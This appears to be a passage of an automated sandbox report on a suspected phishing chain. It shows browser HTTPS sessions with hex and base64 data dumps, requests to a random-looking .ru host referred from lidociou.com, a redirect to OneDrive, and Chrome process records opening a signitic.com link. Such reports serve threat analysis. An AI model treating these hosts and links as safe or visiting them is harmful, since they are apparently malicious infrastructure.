                                                                              2024-12-11 14:20:01 UTC1193INData Raw: 65 6f 68 48 53 59 4b 49 58 6e 36 47 69 32 35 32 6b 48 61 45 56 46 70 6b 62 31 74 77 6e 4a 4a 7a 65 49 78 69 6a 35 75 43 5a 49 57 43 59 33 31 38 68 61 4b 67 6a 47 2b 73 66 5a 47 57 68 4a 47 59 6d 6f 69 56 6a 70 6d 64 69 5a 6d 61 6e 36 4b 50 6f 72 61 58 79 59 65 66 67 72 71 49 68 61 61 35 6f 64 54 56 6c 4a 4c 45 73 38 57 56 78 37 66 4e 6e 63 69 65 30 4c 66 59 30 70 32 65 70 72 50 47 6f 64 57 69 79 36 43 70 30 4b 79 71 37 50 53 78 39 4d 32 31 77 61 7a 77 33 50 54 2b 2b 64 2f 53 41 63 4c 74 34 72 30 47 39 4e 45 4b 31 4d 73 4d 33 41 41 44 34 75 4d 45 35 50 33 6e 34 51 38 52 31 39 66 55 35 74 34 63 34 50 45 57 33 2f 37 66 35 66 6b 65 42 69 4d 4a 2b 69 59 67 35 69 34 7a 41 43 41 6e 35 77 67 56 4f 43 38 52 42 50 4c 76 4d 44 6b 78 4c 6a 73 38 4f 7a 4d 6f 46 6a 6f
                                                                              Data Ascii: eohHSYKIXn6Gi252kHaEVFpkb1twnJJzeIxij5uCZIWCY318haKgjG+sfZGWhJGYmoiVjpmdiZman6KPoraXyYefgrqIhaa5odTVlJLEs8WVx7fNncie0LfY0p2eprPGodWiy6Cp0Kyq7PSx9M21wazw3PT++d/SAcLt4r0G9NEK1MsM3AAD4uME5P3n4Q8R19fU5t4c4PEW3/7f5fkeBiMJ+iYg5i4zACAn5wgVOC8RBPLvMDkxLjs8OzMoFjo
                                                                              2024-12-11 14:20:01 UTC1369INData Raw: 39 55 45 42 64 6e 62 42 65 58 37 33 51 51 50 35 51 59 55 2b 67 7a 6e 33 52 62 35 48 42 6e 7a 44 64 77 63 48 51 59 46 47 65 62 31 34 78 76 70 43 66 41 6e 43 43 67 77 4c 7a 41 43 43 66 67 6d 4c 2f 73 78 48 79 77 4e 4e 43 73 61 48 6a 77 58 45 6a 68 46 51 79 59 59 50 45 55 65 54 52 49 79 56 45 42 4c 4b 42 45 54 52 6b 67 31 47 56 68 55 48 56 42 62 51 6d 42 53 56 44 64 43 50 6c 6b 6f 58 47 4e 6a 5a 79 6c 4e 4d 57 68 73 55 47 64 7a 4e 44 6c 78 58 45 35 71 63 56 55 39 62 33 78 6b 51 57 42 37 62 31 4f 46 67 57 6f 2b 57 55 35 75 54 5a 4b 4d 54 33 4b 49 67 30 31 6d 62 34 64 75 62 70 36 4d 57 33 2b 67 6c 4a 74 64 6c 5a 4f 63 6f 4a 4f 58 71 4a 79 58 70 35 43 77 65 36 32 45 6f 32 65 6f 63 35 4b 54 72 37 43 34 6d 4b 71 32 65 62 32 77 73 4c 53 32 77 70 69 30 67 62 32 61
                                                                              Data Ascii: 9UEBdnbBeX73QQP5QYU+gzn3Rb5HBnzDdwcHQYFGeb14xvpCfAnCCgwLzACCfgmL/sxHywNNCsaHjwXEjhFQyYYPEUeTRIyVEBLKBETRkg1GVhUHVBbQmBSVDdCPlkoXGNjZylNMWhsUGdzNDlxXE5qcVU9b3xkQWB7b1OFgWo+WU5uTZKMT3KIg01mb4dubp6MW3+glJtdlZOcoJOXqJyXp5Cwe62Eo2eoc5KTr7C4mKq2eb2wsLS2wpi0gb2a
                                                                              2024-12-11 14:20:01 UTC1369INData Raw: 45 4c 7a 52 44 74 38 2b 6e 50 34 2f 72 59 35 65 6b 4b 39 39 4d 51 46 76 66 77 2f 75 59 41 4a 2f 6f 56 36 77 63 59 49 42 49 71 42 52 49 79 4c 41 6a 30 4c 79 37 33 4e 43 72 35 2b 6a 51 7a 4e 67 41 30 4f 7a 73 45 4d 44 51 2f 53 55 6f 39 41 44 6b 6c 4f 31 45 64 48 69 67 57 4a 52 67 55 4b 6b 77 57 4f 6b 78 53 55 30 31 44 48 44 6b 74 54 79 42 58 4f 31 49 34 5a 31 56 4e 50 57 74 42 55 44 42 6f 52 47 52 4c 51 31 4a 4d 55 7a 5a 52 61 58 65 42 4f 55 2b 42 4f 6a 64 52 68 6d 68 52 68 6f 74 49 53 48 35 76 6b 48 47 46 69 49 68 79 68 34 78 52 62 32 68 38 61 70 65 4a 58 6c 74 59 69 33 39 57 65 36 56 37 5a 6e 57 64 69 33 71 48 72 4a 65 73 70 36 4b 70 62 59 6d 73 72 6f 36 74 71 62 47 30 76 4b 39 39 6c 72 79 78 6c 35 61 6b 75 61 2f 4a 6c 63 47 64 77 4b 62 47 78 36 62 4c 77
                                                                              Data Ascii: ELzRDt8+nP4/rY5ekK99MQFvfw/uYAJ/oV6wcYIBIqBRIyLAj0Ly73NCr5+jQzNgA0OzsEMDQ/SUo9ADklO1EdHigWJRgUKkwWOkxSU01DHDktTyBXO1I4Z1VNPWtBUDBoRGRLQ1JMUzZRaXeBOU+BOjdRhmhRhotISH5vkHGFiIhyh4xRb2h8apeJXltYi39We6V7ZnWdi3qHrJesp6KpbYmsro6tqbG0vK99lryxl5akua/JlcGdwKbGx6bLw
                                                                              2024-12-11 14:20:01 UTC573INData Raw: 54 45 2f 58 56 48 39 73 55 36 51 2f 31 39 66 41 68 45 43 51 6c 49 42 51 73 35 79 67 6d 36 43 59 69 47 79 67 75 4b 52 59 77 4d 43 77 4c 4a 44 67 76 45 78 59 2b 50 68 55 74 46 44 59 38 51 52 4e 43 47 77 49 57 53 43 41 6d 43 6b 59 4f 4d 6a 52 51 46 53 49 6b 53 78 5a 5a 4a 31 42 58 53 44 68 68 54 54 49 2f 5a 54 70 5a 4e 46 31 4c 4f 7a 5a 70 61 45 5a 48 63 47 78 63 4c 57 35 66 63 55 52 35 63 56 5a 49 66 48 68 65 63 48 4e 73 67 48 32 46 66 58 52 30 65 57 73 2b 6a 48 35 67 62 32 65 43 54 6c 46 30 6a 4a 42 71 63 5a 4e 61 65 6d 6d 57 69 58 4b 5a 6d 57 4b 43 6f 35 52 69 71 58 6d 61 66 33 36 74 6f 5a 6c 75 66 4b 52 76 67 6f 36 31 73 4c 69 59 75 48 71 53 6c 72 46 37 71 59 76 41 72 62 57 54 75 70 75 65 68 38 69 48 6f 35 33 4d 69 36 4f 67 78 63 71 6a 6e 73 71 6f 78 4c
                                                                              Data Ascii: TE/XVH9sU6Q/19fAhECQlIBQs5ygm6CYiGyguKRYwMCwLJDgvExY+PhUtFDY8QRNCGwIWSCAmCkYOMjRQFSIkSxZZJ1BXSDhhTTI/ZTpZNF1LOzZpaEZHcGxcLW5fcUR5cVZIfHhecHNsgH2FfXR0eWs+jH5gb2eCTlF0jJBqcZNaemmWiXKZmWKCo5RiqXmaf36toZlufKRvgo61sLiYuHqSlrF7qYvArbWTupueh8iHo53Mi6OgxcqjnsqoxL


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.1649738104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:20:02 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:20:02 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 11 Dec 2024 14:20:02 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cf-chl-out: 4pl4Hf5/DSx/Iuqli5NreK5HADz+QG50Gi8=$znctilPZ0Hci7UqF
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061cf55e238c05-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:20:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.1649740104.21.32.2514436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:20:04 UTC677OUTGET /GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI HTTP/1.1
                                                                              Host: ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://fht.lidociou.com
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:20:05 UTC899INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:20:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zQYuLOugFOx%2FcWxruYkv%2Bcd4Is9WnlTiPza%2BobMrVab33%2BEMkLEheJdjjewy62g6hfVugF76fVd%2BRJeP9YvUhsoenyjPiga73pjacpAGn6Ls08m3JuUjNVU3FKUD1SIBpPEv8p5n1md2fjXippN6xjR6sQk1tYYagXnnG0yj9R%2Ba%2BZS1oeQODt%2BrlRmJvENrc%2FagxQ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061d0009fc43d4-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4188&recv_bytes=1255&delivery_rate=253318&cwnd=221&unsent_bytes=0&cid=5103fed1a7376919&ts=910&x=0"
                                                                              2024-12-11 14:20:05 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2024-12-11 14:20:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.1649744172.67.139.114436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:20:07 UTC471OUTGET /GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI HTTP/1.1
                                                                              Host: ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:20:08 UTC900INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:20:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHTMOKxUjQXCrtFqbIVKGgRCQ0vixt3nH%2BhgIxtS%2F8OhcGcfyAhetrIbdhVhoFa1QDdIcb8bw5qWJ80OqqHwHFRRt1x%2FyNTyF20idDQy2%2B%2BygG7cQCh6fXF5FR7%2FDi11oZvQWj2D6Pk%2Fx5i2ZZ6qBhJj7H7rd1fuy9%2Bz7xGlU2GKR0QRFr2wI0u6zT1Vo%2F5xgU62Itg%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061d15ddd18c1d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1777&rtt_var=702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1049&delivery_rate=1520041&cwnd=174&unsent_bytes=0&cid=be334ac8ab4041ce&ts=954&x=0"
                                                                              2024-12-11 14:20:08 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2024-12-11 14:20:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.164974513.107.137.114436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:20:09 UTC682OUTGET / HTTP/1.1
                                                                              Host: onedrive.live.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Referer: https://fht.lidociou.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:20:10 UTC2223INHTTP/1.1 302 Found
                                                                              Cache-Control: private
                                                                              Content-Length: 186
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Location: https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                              X-NetworkStatistics: 0,525568,0,0,15111,0,60721,47
                                                                              X-SharePointHealthScore: 0
                                                                              Content-Security-Policy: frame-ancestors 'self' sentry.contentvalidation.com sentry.ppe.contentvalidation.com sentry.int.contentvalidation.com
                                                                              X-AspNet-Version: 4.0.30319
                                                                              X-DataBoundary: NONE
                                                                              X-1DSCollectorUrl: https://mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                              X-AriaCollectorURL: https://browser.pipe.aria.microsoft.com/Collector/3.0/
                                                                              SPRequestGuid: 44846ca1-30a3-7000-05c2-30591f938e20
                                                                              request-id: 44846ca1-30a3-7000-05c2-30591f938e20
                                                                              MS-CV: oWyERKMwAHAFwjBZH5OOIA.0
                                                                              Alt-Svc: h3=":443";ma=86400
                                                                              Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=00000000-0000-0000-0000-000000000000&destinationEndpoint=Edge-Prod-BN3r2&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                              NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-FRAME-OPTIONS: SAMEORIGIN
                                                                              Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                              SPRequestDuration: 9
                                                                              SPIisLatency: 2
                                                                              X-Powered-By: ASP.NET
                                                                              MicrosoftSharePointTeamServices: 16.0.0.25506
                                                                              X-Content-Type-Options: nosniff
                                                                              X-MS-InvokeApp: 1; RequireReadOnly
                                                                              X-Cache: CONFIG_NOCACHE
                                                                              X-MSEdge-Ref: Ref A: E366487FD6064932A2DCE897CECDCD4D Ref B: BN3EDGE0220 Ref C: 2024-12-11T14:20:10Z
                                                                              Date: Wed, 11 Dec 2024 14:20:09 GMT
                                                                              Connection: close
                                                                              2024-12-11 14:20:10 UTC186INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2d 33 36 35 2f 6f 6e 65 64 72 69 76 65 2f 6f 6e 6c 69 6e 65 2d 63 6c 6f 75 64 2d 73 74 6f 72 61 67 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage">here</a>.</h2></body></html>


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:09:19:26
                                                                              Start date:11/12/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:09:19:27
                                                                              Start date:11/12/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1956,i,15815528503565354663,14100251185342758663,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:09:19:28
                                                                              Start date:11/12/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09"
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              No disassembly